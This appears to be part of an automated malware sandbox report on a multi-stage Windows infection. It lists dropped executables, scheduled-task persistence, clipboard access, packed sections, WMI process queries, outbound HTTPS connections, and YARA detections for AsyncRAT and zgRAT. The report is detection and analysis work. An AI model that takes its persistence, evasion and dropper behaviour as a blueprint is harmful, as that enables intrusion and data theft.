                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49777 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49779 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49780 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49783 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.5:49786 version: TLS 1.2
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EE9000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_00EE9000
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EE9000 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,14_2_00EE9000
                                  Source: penis.exe, 00000018.00000002.2884267791.000000000315A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_580c3019-f
                                  Source: Yara matchFile source: 32.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: needmoney.exe PID: 6616, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp21D7.tmpJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\TmpD145.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile created: C:\Users\user\AppData\Local\Temp\TmpE088.tmpJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\TmpD156.tmpJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp21C7.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp3223.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile created: C:\Users\user\AppData\Local\Temp\TmpE0A8.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp3213.tmpJump to dropped file

                                  System Summary

                                  barindex
                                  Source: 37.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                                  Source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: 36.2.rstxdhuj.exe.418fdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPEDMatched rule: Detects zgRAT Author: ditekSHen
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPEDMatched rule: Detects zgRAT Author: ditekSHen
                                  Source: gold[1].exe.6.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 311296
                                  Source: gold.exe.6.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 311296
                                  Source: file.exeStatic PE information: section name:
                                  Source: file.exeStatic PE information: section name: .idata
                                  Source: file.exeStatic PE information: section name:
                                  Source: axplong.exe.0.drStatic PE information: section name:
                                  Source: axplong.exe.0.drStatic PE information: section name: .idata
                                  Source: axplong.exe.0.drStatic PE information: section name:
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name:
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name: .idata
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: section name:
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001AC9F7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,16_2_001AC9F7
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0022C9F7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,17_2_0022C9F7
                                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile created: C:\Windows\Tasks\Hkbsse.job
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_015ADC749_2_015ADC74
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_058769489_2_05876948
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_05877C209_2_05877C20
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_058700079_2_05870007
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_058700409_2_05870040
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_05877C109_2_05877C10
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06B8A6B89_2_06B8A6B8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06B867D89_2_06B867D8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06B8A6889_2_06B8A688
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06B86FF89_2_06B86FF8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06B86FE89_2_06B86FE8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E476A89_2_06E476A8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E4DE609_2_06E4DE60
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E4CE209_2_06E4CE20
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E4E7B89_2_06E4E7B8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E46DD89_2_06E46DD8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E48DB09_2_06E48DB0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E4F2D89_2_06E4F2D8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E4BA059_2_06E4BA05
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E492189_2_06E49218
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E413C09_2_06E413C0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E4A3C89_2_06E4A3C8
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E4B3909_2_06E4B390
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E4C0B19_2_06E4C0B1
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E498589_2_06E49858
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E4CE129_2_06E4CE12
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E46A909_2_06E46A90
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E492089_2_06E49208
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06E413B09_2_06E413B0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040232013_2_00402320
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004050C013_2_004050C0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0042047013_2_00420470
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040FCF013_2_0040FCF0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00419D1913_2_00419D19
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041951B13_2_0041951B
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041563513_2_00415635
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041DEC313_2_0041DEC3
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404F0013_2_00404F00
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040CF8F13_2_0040CF8F
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF760014_2_00EF7600
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF50E014_2_00EF50E0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EE40F514_2_00EE40F5
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF004B14_2_00EF004B
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EFB02014_2_00EFB020
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB100014_2_00EB1000
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB91F014_2_00EB91F0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB12A714_2_00EB12A7
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EBA3C014_2_00EBA3C0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EDC39014_2_00EDC390
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF939014_2_00EF9390
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EDA34514_2_00EDA345
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EFB30014_2_00EFB300
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EC048014_2_00EC0480
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB747014_2_00EB7470
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EBB47014_2_00EBB470
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EBE47014_2_00EBE470
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EC142014_2_00EC1420
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB540014_2_00EB5400
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EDD58E14_2_00EDD58E
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EDD56C14_2_00EDD56C
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00ECE52C14_2_00ECE52C
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EE762014_2_00EE7620
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EE27B014_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB379014_2_00EB3790
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB973714_2_00EB9737
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EDC89114_2_00EDC891
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB881014_2_00EB8810
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF997014_2_00EF9970
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EBA91014_2_00EBA910
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF5AD014_2_00EF5AD0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB9A0214_2_00EB9A02
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00ED7B0F14_2_00ED7B0F
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EDBB0014_2_00EDBB00
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF997014_2_00EF9970
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EE8C0014_2_00EE8C00
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EEFD0E14_2_00EEFD0E
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EDDEF814_2_00EDDEF8
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF7EDE14_2_00EF7EDE
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EBFEBC14_2_00EBFEBC
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF9E6014_2_00EF9E60
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EB7E7014_2_00EB7E70
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EDDFE014_2_00EDDFE0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EBAFD014_2_00EBAFD0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EBBF8014_2_00EBBF80
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EF8F8014_2_00EF8F80
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EEEF5014_2_00EEEF50
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_0100DC7415_2_0100DC74
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_064867D015_2_064867D0
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_0648A3B715_2_0648A3B7
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_06483F5015_2_06483F50
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_06486FE815_2_06486FE8
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeCode function: 15_2_06486FF815_2_06486FF8
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_0019976016_2_00199760
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_0019A87916_2_0019A879
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001B146216_2_001B1462
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001D758B16_2_001D758B
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001D865016_2_001D8650
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001D76AB16_2_001D76AB
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_00194AF016_2_00194AF0
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001D2B0016_2_001D2B00
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001B3C5116_2_001B3C51
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001B0C7316_2_001B0C73
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001C7CB316_2_001C7CB3
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_00194CF016_2_00194CF0
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001D6E3916_2_001D6E39
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001D2F9816_2_001D2F98
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001B5FF216_2_001B5FF2
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0021976017_2_00219760
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0023146217_2_00231462
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0025758B17_2_0025758B
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0025865017_2_00258650
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_002576AB17_2_002576AB
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_00214AF017_2_00214AF0
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_00252B0017_2_00252B00
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_00230C7317_2_00230C73
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_00233C5117_2_00233C51
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_00247CB317_2_00247CB3
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_00214CF017_2_00214CF0
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_00256E3917_2_00256E39
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_00252F9817_2_00252F98
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_00235FF217_2_00235FF2
                                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess token adjusted: Security
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: String function: 00227F20 appears 128 times
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: String function: 0022D7A2 appears 69 times
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: String function: 0022DDE0 appears 39 times
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: String function: 001A7F20 appears 128 times
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: String function: 001AD7A2 appears 69 times
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: String function: 001ADDE0 appears 39 times
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00407D30 appears 55 times
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: String function: 00EBCAD0 appears 53 times
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: String function: 00EBED80 appears 194 times
                                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4024 -ip 4024
                                  Source: neon[1].exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Source: neon.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Source: neon[1].exe.6.drStatic PE information: No import functions for PE file found
                                  Source: neon.exe.6.drStatic PE information: No import functions for PE file found
                                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 37.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                  Source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: 36.2.rstxdhuj.exe.418fdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPEDMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPEDMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                                  Source: rstxdhuj[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: gold[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: gold.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: 12dsvc[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: file.exeStatic PE information: Section: ZLIB complexity 0.9972485950272479
                                  Source: file.exeStatic PE information: Section: ukgzfzxu ZLIB complexity 0.99462749421631
                                  Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9972485950272479
                                  Source: axplong.exe.0.drStatic PE information: Section: ukgzfzxu ZLIB complexity 0.99462749421631
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: Section: ZLIB complexity 0.9982863589918256
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: Section: ewzoukzh ZLIB complexity 0.9947279526245552
                                  Source: 2a8f2f9086.exe.6.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                  Source: neon[1].exe.6.dr, Zz36.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: neon.exe.6.dr, Zz36.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@73/109@19/21
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 14_2_00EE81AA CoCreateInstance,14_2_00EE81AA
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\gold[1].exeJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1084:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:64:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeMutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\TSXTkO0pNBdN2KNw
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03
                                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                                  Source: Yara matchFile source: 32.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000020.00000000.2916373422.0000000000401000.00000020.00000001.01000000.0000001E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
